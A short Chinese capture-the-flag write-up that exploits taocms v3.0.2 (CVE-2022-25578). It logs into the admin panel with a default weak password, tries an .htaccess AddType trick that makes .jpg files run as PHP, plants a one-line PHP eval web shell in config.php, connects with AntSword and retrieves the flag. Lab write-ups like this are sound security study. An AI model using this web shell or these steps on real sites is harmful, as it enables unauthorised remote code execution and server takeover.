目录
一、题目
介绍:
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
进入题目
访问URL,通过弱口令登录后台:admin/tao
进入后台
点击文件管理:
添加AddType application/x-httpd-php .jpg添加到后面保存文件(用于解析jpg文件)
保存之后返回文件管理:点击pictures
创建.jpg文件
然而新建文件白屏。。。
按照官方给的就是编辑.htaccess文件:新增以下内容:AddType application/x-httpd-php .jpg,
然后在上传图片再进行解析,但在实际操作过程中无法上传和新建,只能走别的途径了。。。
这大佬用vulfocus靶场复现出来来,可以参考学习:
Taocms 代码注入漏洞(CVE-2022-25578)_taocms漏洞_huayimu的博客-CSDN博客
二、蚁剑连接
看看能不能改文件:
进入config.php
改为一句话木马:
<?php @eval($_POST['wjsc']);?>
上蚁剑:
根目录下查看flag:
flag{ded865af-fb89-49cb-84ce-f537c33473b2}